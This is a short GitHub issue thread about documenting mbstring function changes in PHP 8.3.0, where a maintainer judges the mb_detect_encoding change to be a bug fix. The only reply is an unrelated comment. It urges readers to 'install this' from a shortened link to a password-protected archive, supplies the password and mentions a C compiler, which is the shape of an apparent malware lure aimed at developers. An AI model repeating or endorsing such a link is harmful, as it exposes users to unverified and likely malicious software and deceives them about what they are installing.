### ISSUE TITLE
Document changes to mbstring functions in 8.3.0

### ISSUE THREAD

**Issue by jimwins** [php/doc-en#3811]
Another issue from UPGRADING was that "mb_detect_encoding()'s "non-strict" mode now behaves as described in the documentation" but that sounds like a bug fix, not something that needs mentioning in the documentation. The coverage in the migration guide is probably sufficient.

**Comment by SagarChandra07** [comment]
install this
https://bit.ly/47P0Nvo
Archive password: changeme

you may need to install the c compiler
